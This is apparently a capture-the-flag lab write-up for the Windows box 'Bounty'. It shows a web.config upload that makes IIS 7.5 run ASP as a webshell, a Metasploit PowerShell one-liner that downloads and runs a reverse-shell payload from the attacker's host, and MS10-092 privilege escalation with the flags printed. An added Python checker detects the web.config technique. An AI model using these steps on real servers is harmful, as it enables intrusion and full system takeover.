
Bounty Practice Notes

☕ 3 min read · ✍️ IceKam

Environment:

Name: Bounty

OS: Windows

Information gathering

Target discovery

$ nmap -A 10.10.10.93
Starting Nmap 7.80 ( https://nmap.org ) at 2019-10-30 10:20 CST
Nmap scan report for 10.10.10.93
Host is up (0.34s latency).
Not shown: 999 filtered ports
PORT   STATE SERVICE VERSION
80/tcp open  http    Microsoft IIS httpd 7.5
| http-methods: 
|_  Potentially risky methods: TRACE
|_http-server-header: Microsoft-IIS/7.5
|_http-title: Bounty
Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port
Device type: general purpose|phone|specialized
Running (JUST GUESSING): Microsoft Windows 8|Phone|2008|7|8.1|Vista|2012 (92%)
  • The system is Windows 7 running IIS/7.5.


Getting a shell

System vulnerability enumeration

<?xml version="1.0" encoding="UTF-8"?>
<configuration>
   <system.webServer>
      <handlers accessPolicy="Read, Script, Write">
         <add name="web_config" path="*.config" verb="*" modules="IsapiModule" scriptProcessor="%windir%\system32\inetsrv\asp.dll" resourceType="Unspecified" requireAccess="Write" preCondition="bitness64" />        
      </handlers>
      <security>
         <requestFiltering>
            <fileExtensions>
               <remove fileExtension=".config" />
            </fileExtensions>
            <hiddenSegments>
               <remove segment="web.config" />
            </hiddenSegments>
         </requestFiltering>
      </security>
   </system.webServer>
</configuration>
 ASP code comes here! It should not include HTML comment closing tag and double dashes!
<%
Response.write("-"&"->")
' it is running the ASP code if you can see 3 by opening the web.config file!
Response.write(1+2)
Response.write("<!-"&"-")
%>
  • A quick search shows that IIS/7.5 can execute ASP code embedded in a web.config; the above is the PoC. It works because the uploaded web.config maps the `*.config` extension to asp.dll and removes the request-filtering rules that normally block `.config` files and hide web.config, so requesting the file runs the ASP block appended after `</configuration>`.
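As an added defensive example (not code from the writeup), the following Python checker looks for the indicators of this PoC in a file dropped into an upload directory: a handler mapping `*.config` to asp.dll, the removal of `.config` from request filtering, the removal of the web.config hidden segment, and a script block after `</configuration>`. The function name `analyze_web_config` and the embedded `SAMPLE` are constructed for this example; the sample mirrors the shape of the PoC above.

```python
import re
import xml.etree.ElementTree as ET

# Constructed sample in the shape of the PoC: a config part followed by trailing ASP.
SAMPLE = """<?xml version="1.0" encoding="UTF-8"?>
<configuration>
  <system.webServer>
    <handlers accessPolicy="Read, Script, Write">
      <add name="web_config" path="*.config" verb="*" modules="IsapiModule"
           scriptProcessor="%windir%\\system32\\inetsrv\\asp.dll"
           resourceType="Unspecified" requireAccess="Write" preCondition="bitness64" />
    </handlers>
    <security>
      <requestFiltering>
        <fileExtensions><remove fileExtension=".config" /></fileExtensions>
        <hiddenSegments><remove segment="web.config" /></hiddenSegments>
      </requestFiltering>
    </security>
  </system.webServer>
</configuration>
<% Response.write(1+2) %>
"""


def analyze_web_config(text):
    """Return a list of indicators found in a (possibly malicious) web.config."""
    findings = []
    # The PoC appends ASP after the closing tag, so the file is not valid XML as a
    # whole: split at </configuration> and inspect the two halves separately.
    head, sep, tail = text.partition("</configuration>")
    if not sep:
        return ["no </configuration> element: not a complete web.config"]
    if re.search(r"<%", tail):
        findings.append("script block (<% ... %>) after </configuration>")
    try:
        root = ET.fromstring((head + sep).encode("utf-8"))
    except ET.ParseError as e:
        return findings + [f"XML parse error: {e}"]
    for h in root.iter("add"):  # handler registrations
        proc = h.get("scriptProcessor", "").lower()
        if h.get("path", "").lower().endswith(".config") and proc.endswith("asp.dll"):
            findings.append(f"handler maps {h.get('path')} to asp.dll")
    for r in root.iter("remove"):  # request-filtering rules being disabled
        if r.get("fileExtension", "").lower() == ".config":
            findings.append("request filtering no longer blocks .config")
        if r.get("segment", "").lower() == "web.config":
            findings.append("web.config removed from hidden segments")
    return findings
```

Any non-empty result on a file in a user-writable web directory is worth an alert; the last three indicators together are the signature of this technique even without a trailing script block.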

Web directory enumeration


  • Only port 80 is open, and the page shows nothing useful, so the only option is to brute-force directories.


  • This turns up transfer.aspx, which leads to remote execution, and the UploadedFiles directory.

Shell generation

<?xml version="1.0" encoding="UTF-8"?>
<configuration>
   <system.webServer>
      <handlers accessPolicy="Read, Script, Write">
         <add name="web_config" path="*.config" verb="*" modules="IsapiModule" scriptProcessor="%windir%\system32\inetsrv\asp.dll" resourceType="Unspecified" requireAccess="Write" preCondition="bitness64" />        
      </handlers>
      <security>
         <requestFiltering>
            <fileExtensions>
               <remove fileExtension=".config" />
            </fileExtensions>
            <hiddenSegments>
               <remove segment="web.config" />
            </hiddenSegments>
         </requestFiltering>
      </security>
   </system.webServer>
</configuration>
  • Take a small ASP webshell, append it to the config above, and save the result as web.config.

Getting a webshell


  • After uploading web.config, commands can be executed through the shell, but files in this directory turn out to be deleted periodically.

Privilege escalation

Reverse shell

msf5 > use exploit/multi/script/web_delivery
msf5 exploit(multi/script/web_delivery) > set payload windows/x64/meterpreter/reverse_tcp
msf5 exploit(multi/script/web_delivery) > set SRVHOST 10.10.14.16
msf5 exploit(multi/script/web_delivery) > set SRVPORT 80
msf5 exploit(multi/script/web_delivery) > set LHOST 10.10.14.16
msf5 exploit(multi/script/web_delivery) > run
[*] Exploit running as background job 1.
[*] Exploit completed, but no session was created.
[*] Started reverse TCP handler on 10.10.14.16:4444 
msf5 exploit(multi/script/web_delivery) > [*] Using URL: http://10.10.14.16:80/yXwrLG55ZN
[*] Server started.
[*] Run the following command on the target machine:
powershell.exe -nop -w hidden -c $C=new-object net.webclient;$C.proxy=[Net.WebRequest]::GetSystemWebProxy();$C.Proxy.Credentials=[Net.CredentialCache]::DefaultCredentials;IEX $C.downloadstring('http://10.10.14.16/yXwrLG55ZN');
[*] 10.10.10.93      web_delivery - Delivering Payload (2125) bytes
[*] Sending stage (206403 bytes) to 10.10.10.93


msf5 exploit(multi/script/web_delivery) > sessions -i 1 
[*] Starting interaction with 1...

meterpreter > shell
Microsoft Windows [Version 6.1.7600]
  • Use the MSF web_delivery module to generate the PowerShell reverse-shell one-liner, then run it through the webshell to get the session back.

Local vulnerability enumeration

C:\windows\system32\inetsrv>exit
exit
meterpreter > background 

msf5 exploit(multi/script/web_delivery) > use post/multi/recon/local_exploit_suggester
msf5 post(multi/recon/local_exploit_suggester) > set session 1 
msf5 post(multi/recon/local_exploit_suggester) > run
[*] 10.10.10.93 - Collecting local exploits for x64/windows...
[*] 10.10.10.93 - 11 exploit checks are being tried...
[+] 10.10.10.93 - exploit/windows/local/ms10_092_schelevator: The target appears to be vulnerable.
[+] 10.10.10.93 - exploit/windows/local/ms16_014_wmi_recv_notif: The target appears to be vulnerable.
[+] 10.10.10.93 - exploit/windows/local/ms16_075_reflection: The target appears to be vulnerable.
[+] 10.10.10.93 - exploit/windows/local/ms16_075_reflection_juicy: The target appears to be vulnerable.
  • The suggester reports the vulnerabilities above.

Searching for the exploit

msf5 post(multi/recon/local_exploit_suggester) > search ms10_092

Matching Modules
================

   ##  Name                                        Disclosure Date  Rank       Check  Description
   -  ----                                        ---------------  ----       -----  -----------
   0  exploit/windows/local/ms10_092_schelevator  2010-09-13       excellent  Yes    Windows Escalate Task Scheduler XML Privilege Escalation

Exploitation

msf5 post(multi/recon/local_exploit_suggester) > use exploit/windows/local/ms10_092_schelevator

msf5 exploit(windows/local/ms10_092_schelevator) > set session 1 
msf5 exploit(windows/local/ms10_092_schelevator) > set LHOST 10.10.14.16

msf5 exploit(windows/local/ms10_092_schelevator) > set LPORT 4443
LPORT => 4443
msf5 exploit(windows/local/ms10_092_schelevator) > run
  • Privilege escalation succeeded.

Flags

meterpreter > cd c:/
meterpreter > cd Users
meterpreter > cd merlin
meterpreter > cd Desktop
meterpreter > dir
Listing: c:\Users\merlin\Desktop
================================

Mode              Size  Type  Last modified              Name
----              ----  ----  -------------              ----
100666/rw-rw-rw-  282   fil   2018-05-30 05:22:39 +0800  desktop.ini
100666/rw-rw-rw-  32    fil   2018-05-31 04:32:40 +0800  user.txt
meterpreter > cat user.txt
e29ad89891462e0b09741e3082f44a2fmeterpreter > 

meterpreter > cd ../
meterpreter > cd ../
meterpreter > cd Administrator
meterpreter > cd Desktop
meterpreter > dir
Listing: c:\Users\Administrator\Desktop
=======================================

Mode              Size  Type  Last modified              Name
----              ----  ----  -------------              ----
100666/rw-rw-rw-  282   fil   2018-05-31 05:18:12 +0800  desktop.ini
100666/rw-rw-rw-  32    fil   2018-05-31 05:18:22 +0800  root.txt

meterpreter > cat root.txt
c837f7b699feef5475a0c079f9d4f5ea

Thoughts

A decent, entry-level box: it covers both the web side and system privilege escalation.
